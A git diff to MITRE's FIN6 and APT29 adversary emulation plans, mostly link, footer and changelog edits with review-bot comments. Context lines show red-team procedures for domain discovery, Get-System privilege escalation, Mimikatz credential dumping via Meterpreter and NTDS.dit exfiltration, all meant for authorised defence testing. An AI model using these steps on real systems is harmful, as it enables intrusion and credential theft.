diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index 021a2ca0..04d93e3b 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -2,7 +2,7 @@
## How to contribute
-Thanks for contributing to the FIN6 Adversary Emulation Plan!
+Thanks for contributing to the Adversary Emulation Library!
You are welcome to comment on issues, open new issues, and open pull requests.
@@ -11,9 +11,9 @@ Pull requests should target the **[develop](https://github.com/center-for-threat
Also, if you contribute any source code, we need you to agree to the following Developer's Certificate of Origin below.
## Reporting issues with emulation procedures
-
+
* Describe (in detail) what should have happened. Include any supporting information that may be helpful in resolving the issue.
-
+
* Be sure to include any steps to replicate the issue.
## Developer's Certificate of Origin v1.1
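Review bot: the paired `-`/`+` blank lines in the "Reporting issues" list differ only in trailing whitespace, so this hunk changes nothing in the rendered page and only adds noise to the review; either drop it or move whitespace stripping into its own commit. While the file is open, the context sentence "agree to the following Developer's Certificate of Origin below" says "following" and "below" for the same thing; one of them can go.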
diff --git a/README.md b/README.md
index 33251f88..f005d47d 100644
--- a/README.md
+++ b/README.md
@@ -7,12 +7,12 @@ Also see our recent blog on the [Adversary Emulation Library](https://medium.com
Available adversary emulation plans are listed below:
| Emulation Plan | Intelligence Summary |
-|------|------|
+|:-----:|------|
| [FIN6](/fin6/) | [FIN6 is thought to be a financially motivated cyber-crime group. The group has aggressively targeted and compromised high-volume POS systems in the hospitality and retail sectors since at least 2015...](/fin6/Intelligence_Summary.md) |
| [APT29](/apt29/) | [APT29 is thought to be an organized and well-resourced cyber threat actor whose collection objectives appear to align with the interests of the Russian Federation...](/apt29/Intelligence_Summary.md) |
+| [menuPass](/menuPass/) | [menuPass is thought to be threat group motivated by collection objectives, with targeting that is consistent with Chinese strategic objectives...](/menuPass/Intelligence_Summary.md) |
-
-## Philosophy
+## Philosophy
These adversary emulation plans are based on known-adversary behaviors and designed to empower red teams to manually emulate a specific threat actor in order to test and evaluate defensive capabilities from a threat-informed perspective. This approach empowers defenders to operationalize cyber threat intelligence to better understand and combat real-world adversaries. Rather than focusing on static signatures, these intelligence-driven emulation plans provide a repeatable means to test and tune defensive capabilities and products against the evolving Tactics, Techniques, and Procedures (TTPs) of threat actors and malware.
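Review bot: the new menuPass row is missing an article ("is thought to be a threat group"), and its links `/menuPass/` and `/menuPass/Intelligence_Summary.md` point at a folder that is not created anywhere visible in this diff, so confirm the menuPass plan lands in the same change or the table will ship a dead link. The header change `|:-----:|------|` centres only the Emulation Plan column while the Intelligence Summary column stays left-aligned; if that asymmetry is intended it is fine, otherwise keep both columns the same. The `## Philosophy` pair is a trailing-whitespace-only edit.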
@@ -34,11 +34,11 @@ In summary, each emulation plan should be perceived as input to an offensive ass
Each emulation plan focuses on a specific named threat actor. The README of each individual plan provides a curated summary of available cyber threat intelligence, composed of an intelligence overview of the actor (describing who they target, how, and why where possible) as well as the scope of their activity (i.e. breadth of techniques and malware used). All presented information is cited back to relevant publicly available cyber threat intelligence and communicated and annotated via [ATT&CK](https://attack.mitre.org/).
-Within each emulation plan, the operational flow provides a high-level summary of the captured scenario(s). These scenarios will vary based on the adversary and available intelligence, but typically follow a sequential progression of how the actor breaches then works towards achieving their operational objectives within a victim environment (espionage, data/system destruction, etc.).
+Within each emulation plan, the operational flow provides a high-level summary of the captured scenario(s). These scenarios will vary based on the adversary and available intelligence, but typically follow a sequential progression of how the actor breaches then works towards achieving their operational objectives within a victim environment (espionage, data/system destruction, etc.).
The content to execute the scenario(s) is broken down into step-by-step procedures provided in both human and machine-readable formats. Scenarios can be executed end-to-end or as individual tests. The human-readable formats provide additional relevant background where possible as well as any setup prerequisites, while the machine-readable format is designed to be programmatically parsed (ex: read, reformatted, and ingested into an automated agent, such as [CALDERA](https://github.com/mitre/caldera) and/or breach simulation frameworks).
-Detailed documenation for our emulation plan structure can be found [here.](/emulation_plan_structure.md)
+Detailed documenation for our emulation plan structure can be found [here.](/structure/emulation_plan_structure.md)
## Future Work
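Review bot: the re-pointed documentation link keeps the typo "documenation" and the full stop inside the link text (`[here.]`); since the line is already being changed, fix both, e.g. "Detailed documentation for our emulation plan structure can be found [here](/structure/emulation_plan_structure.md)." The other changed line in this hunk ("Within each emulation plan...") differs only in trailing whitespace.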
@@ -50,14 +50,13 @@ Please submit issues for any technical questions/concerns or contact ctid@mitre-
Also see the guidance for contributors if are interested in [contributing.](/CONTRIBUTING.md)
-
## Liability / Responsible Usage
This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research.
## Notice
-Copyright 2020 MITRE Engenuity. Approved for public release. Document number CT0005
+Copyright 2020-2021 MITRE Engenuity. Approved for public release. Document number CT0005
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
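Review bot: the copyright line becomes "2020-2021" here, but apt29/NOTICE.txt and apt29/README.md later in this patch replace "2020" with "2021" outright, dropping the first publication year; use the range form in all three places. The context line just above, "if are interested in [contributing.]", is missing "you" and, as in the structure link, carries the full stop inside the link text; both are worth fixing while this section is being edited.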
diff --git a/apt29/CHANGE_LOG.md b/apt29/CHANGE_LOG.md
index 30456160..64e759b9 100644
--- a/apt29/CHANGE_LOG.md
+++ b/apt29/CHANGE_LOG.md
@@ -3,6 +3,7 @@
## APT29 Emulation Plan
|Version | Date | Change Details |
-|:--- |:---|:---|
-0.1 | April 2020 | ATT&CK Evaluations Release
-1.0 | January 2021 | Adversary Emulation Library Release
+|:---|:---|:---|
+| 0.1 | 21 April 2020 | ATT&CK Evaluations Release
+| 1.0 | 21 January 2021 | Adversary Emulation Library Release
+
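Review bot: the two rewritten rows open with `|` but have no closing `|`, unlike the header row and unlike the fin6/CHANGE_LOG.md rows elsewhere in this patch; GitHub tolerates it, but keep the rows consistent, e.g. `| 0.1 | 21 April 2020 | ATT&CK Evaluations Release |`. Both dates also gain a day-of-month ("21") that the previous entries did not have; confirm those against the actual release tags. The hunk additionally appends an extra blank line at end of file, which looks unintentional.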
diff --git a/apt29/Emulation_Plan/README.md b/apt29/Emulation_Plan/README.md
index 38e966e2..6d30ef30 100644
--- a/apt29/Emulation_Plan/README.md
+++ b/apt29/Emulation_Plan/README.md
@@ -31,7 +31,7 @@ We would like to formally thank the people that contributed to the content, revi
- [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
- [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
- [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
- - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+ - [YAML](/apt29/Emulation_Plan/yaml)
- [Archive](/apt29/Archive)
- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
- [Change Log](/apt29/CHANGE_LOG.md)
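Review bot: the YAML link now targets the folder `/apt29/Emulation_Plan/yaml` rather than a file, which is fine given the folder README this patch adds, but the identical footer block is edited by hand in eight existing apt29 files here (this README, both Scenario READMEs, both Infrastructure.md files, Intelligence_Summary.md, Operations_Flow.md, apt29/README.md) plus the new yaml/README.md; every future footer change has to be repeated in all of them. Consider recording in /structure/emulation_plan_structure.md which files carry the footer, or generating it, so the copies do not drift.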
diff --git a/apt29/Emulation_Plan/Scenario_1/Infrastructure.md b/apt29/Emulation_Plan/Scenario_1/Infrastructure.md
index d3e29973..1faa98df 100644
--- a/apt29/Emulation_Plan/Scenario_1/Infrastructure.md
+++ b/apt29/Emulation_Plan/Scenario_1/Infrastructure.md
@@ -119,7 +119,7 @@ Import-PfxCertificate -Exportable -FilePath "shockwave.local.pfx" -CertStoreLoca
- [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
- [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
- [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
- - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+ - [YAML](/apt29/Emulation_Plan/yaml)
- [Archive](/apt29/Archive)
- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
- [Change Log](/apt29/CHANGE_LOG.md)
diff --git a/apt29/Emulation_Plan/Scenario_1/README.md b/apt29/Emulation_Plan/Scenario_1/README.md
index 8c55f2a5..c2b15071 100644
--- a/apt29/Emulation_Plan/Scenario_1/README.md
+++ b/apt29/Emulation_Plan/Scenario_1/README.md
@@ -545,7 +545,7 @@ Trigger the Startup Folder persistence by logging in to Windows victim 1
- [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
- [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
- [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
- - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+ - [YAML](/apt29/Emulation_Plan/yaml)
- [Archive](/apt29/Archive)
- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
- [Change Log](/apt29/CHANGE_LOG.md)
diff --git a/apt29/Emulation_Plan/Scenario_2/Infrastructure.md b/apt29/Emulation_Plan/Scenario_2/Infrastructure.md
index 54629e83..4b92b862 100644
--- a/apt29/Emulation_Plan/Scenario_2/Infrastructure.md
+++ b/apt29/Emulation_Plan/Scenario_2/Infrastructure.md
@@ -96,7 +96,7 @@ We hope to capture the general structure of what is reported to have been seen b
- [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
- [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
- [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
- - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+ - [YAML](/apt29/Emulation_Plan/yaml)
- [Archive](/apt29/Archive)
- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
- [Change Log](/apt29/CHANGE_LOG.md)
diff --git a/apt29/Emulation_Plan/Scenario_2/README.md b/apt29/Emulation_Plan/Scenario_2/README.md
index 906ec033..899ac62e 100644
--- a/apt29/Emulation_Plan/Scenario_2/README.md
+++ b/apt29/Emulation_Plan/Scenario_2/README.md
@@ -360,7 +360,7 @@ The original victim is rebooted and the legitimate user logs in, emulating ordin
- [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
- [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
- [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
- - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+ - [YAML](/apt29/Emulation_Plan/yaml)
- [Archive](/apt29/Archive)
- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
- [Change Log](/apt29/CHANGE_LOG.md)
diff --git a/apt29/Emulation_Plan/APT29.yaml b/apt29/Emulation_Plan/yaml/APT29.yaml
similarity index 99%
rename from apt29/Emulation_Plan/APT29.yaml
rename to apt29/Emulation_Plan/yaml/APT29.yaml
index a882fe8c..4bb0e7e2 100644
--- a/apt29/Emulation_Plan/APT29.yaml
+++ b/apt29/Emulation_Plan/yaml/APT29.yaml
@@ -2,7 +2,7 @@
- emulation_plan_details:
id: 4975696e-1d41-11eb-adc1-0242ac120002
- adversary_name: APT29 Adversary Emulation Plan
+ adversary_name: APT29
adversary_description: APT29 is a threat group that has been attributed to the Russian government who have been in operation since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015.
attack_version: 8.1
format_version: 1.0
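Review bot: shortening `adversary_name` from "APT29 Adversary Emulation Plan" to "APT29" changes a value an execution runner may surface as a label, and the rename to `yaml/APT29.yaml` breaks any external reference to the old path `/apt29/Emulation_Plan/APT29.yaml`; neither is recorded in apt29/CHANGE_LOG.md in this patch (its 1.0 row is only reformatted), so add an entry there. If the intended meaning of `adversary_name` changed (group name rather than plan title), also consider whether `format_version: 1.0` should move, or at least document the field's meaning in the structure documentation.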
diff --git a/apt29/Emulation_Plan/yaml/README.md b/apt29/Emulation_Plan/yaml/README.md
new file mode 100644
index 00000000..d95e43ad
--- /dev/null
+++ b/apt29/Emulation_Plan/yaml/README.md
@@ -0,0 +1,27 @@
+# Machine-Readable APT29 Emulation Plans
+
+The universal, technology-agnostic version of the APT29 emulation plan YAML has been provided as starting point for machine parsing and execution of the APT29 emulation plan. This folder will store all versions of this yaml file, including those formatted to work with specific execution runners (such as automated agents like [CALDERA](https://github.com/mitre/caldera) or other breach simulation frameworks).
+
+## Included Formats
+
+As new files are added, please list them in the below table.
+
+| File | Execution Framework | Notes |
+| --- | --- | --- |
+| [APT29.yaml](/apt29/Emulation_Plan/yaml/APT29.yaml) | N/A | Initial Emulation Plan YAML |
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/apt29/Intelligence_Summary.md)
+- [Operations Flow](/apt29/Operations_Flow.md)
+- [Emulation Plan](/apt29/Emulation_Plan/README.md)
+ - [Scenario 1 - Infrastructure](/apt29/Emulation_Plan/Scenario_1/Infrastructure.md)
+ - [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
+ - [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
+ - [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
+ - [YAML](/apt29/Emulation_Plan/yaml)
+- [Archive](/apt29/Archive)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/apt29/CHANGE_LOG.md)
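Review bot: in the opening paragraph, "has been provided as starting point" needs "a", and "yaml file" should be "YAML file" to match the heading and the table. The table's Execution Framework column reads "N/A" for the technology-agnostic file; a value such as "None (generic)" would say what the column means for that row. The footer's own `[YAML](/apt29/Emulation_Plan/yaml)` entry links the folder this README already lives in; harmless, but it could be left unlinked here.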
diff --git a/apt29/Intelligence_Summary.md b/apt29/Intelligence_Summary.md
index 24c53af9..a2b08c3c 100644
--- a/apt29/Intelligence_Summary.md
+++ b/apt29/Intelligence_Summary.md
@@ -147,7 +147,7 @@ ID | Source | Publisher | Date |
- [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
- [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
- [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
- - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+ - [YAML](/apt29/Emulation_Plan/yaml)
- [Archive](/apt29/Archive)
- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
- [Change Log](/apt29/CHANGE_LOG.md)
diff --git a/apt29/NOTICE.txt b/apt29/NOTICE.txt
index 1a097f3a..837a3fd1 100644
--- a/apt29/NOTICE.txt
+++ b/apt29/NOTICE.txt
@@ -1,4 +1,4 @@
-Copyright 2020 MITRE Engenuity. Approved for public release. Document number AT0008.
+Copyright 2021 MITRE Engenuity. Approved for public release. Document number AT0008.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
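Review bot: replacing "Copyright 2020" with "Copyright 2021" drops the original publication year, whereas the top-level README.md in this same patch extends the line to "2020-2021"; the apt29/README.md hunk below makes the same replacement. A copyright notice normally keeps the first year, so "2020-2021" in all three places is the safer and consistent form.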
diff --git a/apt29/Operations_Flow.md b/apt29/Operations_Flow.md
index cd236227..2022ea28 100644
--- a/apt29/Operations_Flow.md
+++ b/apt29/Operations_Flow.md
@@ -37,7 +37,7 @@ The content to execute this scenario was tested and developed using PoshC2 and o
- [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
- [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
- [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
- - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+ - [YAML](/apt29/Emulation_Plan/yaml)
- [Archive](/apt29/Archive)
- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
- [Change Log](/apt29/CHANGE_LOG.md)
diff --git a/apt29/README.md b/apt29/README.md
index 383073a9..3fe02bc3 100644
--- a/apt29/README.md
+++ b/apt29/README.md
@@ -31,7 +31,7 @@ We would like to formally thank the people that contributed to the content, revi
- [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
- [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
- [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
- - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+ - [YAML](/apt29/Emulation_Plan/yaml)
- [Archive](/apt29/Archive)
- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
- [Change Log](/apt29/CHANGE_LOG.md)
@@ -42,7 +42,7 @@ This content is only to be used with appropriate prior, explicit authorization f
## Notice
-Copyright 2020 MITRE Engenuity. Approved for public release. Document number AT0008.
+Copyright 2021 MITRE Engenuity. Approved for public release. Document number AT0008.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
diff --git a/changelog.md b/changelog.md
deleted file mode 100644
index cf074e46..00000000
--- a/changelog.md
+++ /dev/null
@@ -1,3 +0,0 @@
-**Current version: v1.0**
-
-No changes yet!
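Review bot: deleting the root changelog.md leaves only the per-plan CHANGE_LOG.md files, so library-wide changes (the CONTRIBUTING.md wording, the structure document moving to /structure/, the YAML folder reorganisation in this very patch) have nowhere to be recorded; if the file is going because it was a placeholder, replace it with a real top-level CHANGE_LOG.md in the same `|Version | Date | Change Details |` format the plans use rather than removing it outright.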
diff --git a/fin6/CHANGE_LOG.md b/fin6/CHANGE_LOG.md
index 131425a1..ad02f727 100644
--- a/fin6/CHANGE_LOG.md
+++ b/fin6/CHANGE_LOG.md
@@ -2,6 +2,6 @@
## FIN6 Emulation Plan
-Version | Date | Change Details |
---- | --- | --- |
-1.0 | 15 September 2020 | Initial Release
+|Version | Date | Change Details |
+|:---|:---|:---|
+| 1.0 | 15 September 2020 | Adversary Emulation Library Release |
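Review bot: relabelling the 1.0 row from "Initial Release" to "Adversary Emulation Library Release" while keeping its 15 September 2020 date conflicts with the APT29 log in this patch, where the library release is dated 21 January 2021; the FIN6 plan shipped before the library existed. Keep the 1.0 row as "Initial Release" and add a separate row for this patch's changes (YAML moved under /fin6/Emulation_Plan/yaml, footers added, table reformatted) so the history stays accurate. The table fix itself, adding the leading `|` and `:---` alignment, is good.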
diff --git a/fin6/Emulation_Plan/Infrastructure.md b/fin6/Emulation_Plan/Infrastructure.md
index 378cb6a7..ccdc2969 100644
--- a/fin6/Emulation_Plan/Infrastructure.md
+++ b/fin6/Emulation_Plan/Infrastructure.md
@@ -2,10 +2,12 @@
FIN6 infrastructure is likely comprised of distributed command and control (C2) servers and exfiltration servers. FIN6 is reported to have conducted C2 over HTTPS. As such, it would be wise to purchase, associate, and categorize a domain for each redirector. [Let's Encrypt](https://letsencrypt.org) is a resource for free SSL/TLS certificates.
-FIN6 uses separate servers for exfiltration. They appear to purchase domain names that are similar/relevent to their target organization in order to blend in. The group may very well use one server to exfiltrate Discovery data during Phase 1, and separate servers to exfiltrate PoS or payment data during Phase 2. Specific server configuration very much depends on the C2 framework.
+FIN6 uses separate servers for exfiltration. They appear to purchase domain names that are similar/relevent to their target organization in order to blend in. The group may very well use one server to exfiltrate Discovery data during Phase 1, and separate servers to exfiltrate PoS or payment data during Phase 2. Specific server configuration very much depends on the C2 framework.
Detailing specific infrastructure configuration is beyond the scope of this plan. Please consult the following resources:
+---
+
## Infrastructure Configuration
* [Cloud-based Redirectors for Distributed Hacking](https://blog.cobaltstrike.com/2014/14/cloud-based-redirectors-for-distributed-hacking/)
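Review bot: the rewritten exfiltration paragraph keeps "similar/relevent"; correct it to "relevant" since the line is already changing (the only other difference is trailing whitespace). The inserted `---` plus blank line before `## Infrastructure Configuration` is fine as a presentation choice, but make sure every `##` section in the file gets the same separator so the page does not look half-converted.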
@@ -14,6 +16,8 @@ Detailing specific infrastructure configuration is beyond the scope of this plan
* [Red Team Infrastructure Wiki](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki)
* [A Deep Dive into Cobalt Strike Malleable C2](https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b)
+---
+
## Emulation Team Systems and Tools
The following represents a bare minimum but should be operationally representative of FIN6 infrastructure and toolset:
@@ -57,4 +61,18 @@ The following represents a bare minimum but should be operationally representati
* ### Phase 2 - E-Commerce Exfiltration
- * HTTP - FIN6 is reported to have exfiltrated payment data resulting from it's Magecart Group 6 activity via HTTP POST.[10](https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/) In order to emulate this use case (Phase 2 Scenario 2), you will need to set up an exfiltration server capable of receiving HTTP POST requests. Depending on how you intend to evaluate this scenario, a lightweight solution like Python's http.server may be appropriate. This activity is further described in Phase 2.
\ No newline at end of file
+ * HTTP - FIN6 is reported to have exfiltrated payment data resulting from it's Magecart Group 6 activity via HTTP POST.[10](https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/) In order to emulate this use case (Phase 2 Scenario 2), you will need to set up an exfiltration server capable of receiving HTTP POST requests. Depending on how you intend to evaluate this scenario, a lightweight solution like Python's http.server may be appropriate. This activity is further described in Phase 2.
+
+---
+
+## Additional Plan Resources
+
+* [Intelligence Summary](/fin6/Intelligence_Summary.md)
+* [Operations Flow](/fin6/Operations_Flow.md)
+* [Emulation Plan](/fin6/Emulation_Plan/README.md)
+ - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
+ - [Phase 1](/fin6/Emulation_Plan/Phase1.md)
+ - [Phase 2](/fin6/Emulation_Plan/Phase2.md)
+ - [YAML](/fin6/Emulation_Plan/yaml)
+* [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+* [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
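Review bot: the re-added Phase 2 bullet keeps "it's Magecart Group 6 activity"; it should be "its". In the new footer, the Change Log entry is an absolute URL into the `master` branch of the GitHub repository while every other entry is a repo-relative path; CONTRIBUTING.md in this patch says pull requests target `develop`, so the absolute link shows stale content from a different branch and breaks on forks. Use `/fin6/CHANGE_LOG.md`, as the apt29 footers do.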
diff --git a/fin6/Emulation_Plan/Phase1.md b/fin6/Emulation_Plan/Phase1.md
index a8c9923a..937d1685 100644
--- a/fin6/Emulation_Plan/Phase1.md
+++ b/fin6/Emulation_Plan/Phase1.md
@@ -28,7 +28,7 @@ Phase 1 is the pursuit of enabling objectives. Phase 2, the operational effects
As FIN6 appears to be monetarily motivated, they take a pragmatic approach toward delivery. FIN6 has employed social engineering ala direct messages on LinkedIn, spear-phished, compromised e-commerce sites, and it has been suggested that they have negotiated or even purchased access to previously compromised networks.[4](https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html) [5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24) [7](https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems) [8](https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/) [11](https://proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers) It is therefore, recommended for the purpose of threat emulation, that assessors approach delivery in the same manner.
-For teams that intend to emulate the threat actor for every stage of the kill-chain and assess their organization’s ability to protect, as well as detect and respond it may be prudent to approach this step from a red team perspective. Conduct reconnaissance and choose a method of delivery that has the highest likelihood of successful delivery and exploitation. For teams that are primarily interested in assessing their organization’s ability to detect and respond to FIN6 activity, it may not be worth the investment of resources. For these assessors, it is recommended that you assume breach using the C2 framework of your choice. FIN6 has made use of CobaltStrike and Metasploit. Koadic C2 may be a good option to emulate the more_eggs implant.
+For teams that intend to emulate the threat actor for every stage of the kill-chain and assess their organization’s ability to protect, as well as detect and respond it may be prudent to approach this step from a red team perspective. Conduct reconnaissance and choose a method of delivery that has the highest likelihood of successful delivery and exploitation. For teams that are primarily interested in assessing their organization’s ability to detect and respond to FIN6 activity, it may not be worth the investment of resources. For these assessors, it is recommended that you assume breach using the C2 framework of your choice. FIN6 has made use of CobaltStrike and Metasploit. Koadic C2 may be a good option to emulate the more_eggs implant.
---
@@ -56,7 +56,7 @@ net user /domain > ad_users.txt
#### 2.2 - Remote System Discovery ([T1018](https://attack.mitre.org/techniques/T1018/))
-Identify all computer objects and output the results to a text file.
+Identify all computer objects and output the results to a text file.
##### FIN6 Procedure
@@ -88,7 +88,7 @@ Get-ADOrganizationalUnit -Filter 'Name -like "*"' | Format-Table Name, Distingui
#### 2.4 - Domain Trust Discovery ([T1482](https://attack.mitre.org/techniques/T1482/))
-Performs a full forest search and dumps trust objects to a text file.
+Performs a full forest search and dumps trust objects to a text file.
##### FIN6 Procedure
@@ -137,9 +137,9 @@ net group /domain > ad_group.txt
## Step 3 - FIN6 Privilege Escalation
-The third objective is to escalate privileges. Again, in this regard, FIN6 has taken a pragmatic approach. Reporting suggests the group has purchased credentials, made heavy use of credential access, and used the “getsystem” modules included in publicly available penetration testing frameworks.[4](https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html) [5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24) [7](https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems) FIN6 has been reported to further compromise the Windows domain by copying and exfiltrating the Active Directory database (NTDS.dit) file.[3](https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf) The information therein enables the group to move freely throughout the domain and pursue their operational objectives.
+The third objective is to escalate privileges. Again, in this regard, FIN6 has taken a pragmatic approach. Reporting suggests the group has purchased credentials, made heavy use of credential access, and used the “getsystem” modules included in publicly available penetration testing frameworks.[4](https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html) [5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24) [7](https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems) FIN6 has been reported to further compromise the Windows domain by copying and exfiltrating the Active Directory database (NTDS.dit) file.[3](https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf) The information therein enables the group to move freely throughout the domain and pursue their operational objectives.
-Privilege escalation can be challenging, it is recommended that you choose your initial target for “compromise” carefully. In the event that the assessing team is unable to escalate privileges, this event can be “white-carded” with the granting of administrative rights to the compromised account. This white-carded event could enable the assessing team to escalate via credential access as the procedures described herein require elevated privileges.
+Privilege escalation can be challenging, it is recommended that you choose your initial target for “compromise” carefully. In the event that the assessing team is unable to escalate privileges, this event can be “white-carded” with the granting of administrative rights to the compromised account. This white-carded event could enable the assessing team to escalate via credential access as the procedures described herein require elevated privileges.
### Procedures
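Review bot: the second rewritten paragraph opens with a comma splice, "Privilege escalation can be challenging, it is recommended that you choose..."; since the only other change on these lines is trailing whitespace, split or join the clauses while the line is being touched, e.g. "Privilege escalation can be challenging, so choose your initial target for "compromise" carefully."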
@@ -171,7 +171,7 @@ Example: Get-System -ServiceName 'mstdc' -PipeName 'mstdc'
##### Meterpreter/Mimikatz
-Reporting indicates that FIN6 has used Mimikatz on several occasions.[7](https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems) [8](https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/) [9](https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/) While there are many variations of the tool, FIN6 has to date, favored the use of Metasploit and CobaltStrike for post-exploitation.[4](https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html) [5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24) [7](https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems) [8](https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/) [9](https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/) As such, the recommended procedure specifies using Mimikatz from a Meterpreter session. This of course, requires a Meterpreter session and elevated privileges. The commands below load Mimikatz into memory and attempt to retrieve wdigest credentials.
+Reporting indicates that FIN6 has used Mimikatz on several occasions.[7](https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems) [8](https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/) [9](https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/) While there are many variations of the tool, FIN6 has to date, favored the use of Metasploit and CobaltStrike for post-exploitation.[4](https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html) [5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24) [7](https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems) [8](https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/) [9](https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/) As such, the recommended procedure specifies using Mimikatz from a Meterpreter session. This of course, requires a Meterpreter session and elevated privileges. The commands below load Mimikatz into memory and attempt to retrieve wdigest credentials.
##### FIN6 Procedure
@@ -184,9 +184,9 @@ meterpreter> creds_all
##### Metasploit ntdsgrab
